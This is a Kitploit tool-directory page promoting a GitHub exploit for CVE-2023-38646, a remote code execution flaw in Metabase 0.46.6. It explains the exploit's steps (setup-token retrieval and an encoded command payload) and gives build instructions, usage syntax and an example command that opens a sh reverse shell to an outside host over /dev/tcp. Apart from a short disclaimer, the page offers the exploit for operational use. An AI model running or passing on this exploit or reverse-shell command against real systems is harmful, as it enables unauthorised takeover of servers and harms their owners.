Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-38646 — Exploit for CVE-2023-38646 in Metabase 0.46.6, enabling remote code execution via crafted requests and setup token retrieval. | Kitploit
Tools/GitHubGitHub/danithehack3r/cve-2023-38646
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Trojan
GitHubdanithehack3r/cve-2023-38646

CVE-2023-38646

Exploit for CVE-2023-38646 in Metabase 0.46.6, enabling remote code execution via crafted requests and setup token retrieval.

View Repository
2 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-38646

CVE-2023-38646 Metabase 0.46.6 exploit

This tool exploits a vulnerability (CVE-2023-38646) in a software platform. The exploit allows for remote code execution via a crafted request, leveraging a mishandled database connection string.

Overview

The tool:

  • Fetches the setup token from the target URL.
  • Base64 encodes the supplied command.
  • Constructs the payload with the encoded command.
  • Sends the payload to exploit the vulnerability.

Installation

Clone the repository:

root@kitploit:~
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit

Usage

root@kitploit:~
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]

TARGET_URL: The URL of the platform to be scanned and exploited. COMMAND: The command to be executed on the target. PROXY_URL (Optional): The URL of the proxy server (e.g., http://127.0.0.1:8080). If not provided, no proxy will be used.

Example with a sh reverse shell

root@kitploit:~
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080

Disclaimer

This tool is intended for educational and research purposes only. Always ensure you have proper authorization before scanning or exploiting any target. Misuse of this tool is strictly against the developer's intention and could be illegal.

Feedback & Contributions

Feel free to open issues for any feedback, bugs, or feature requests. Pull requests are always welcome!

Download Tool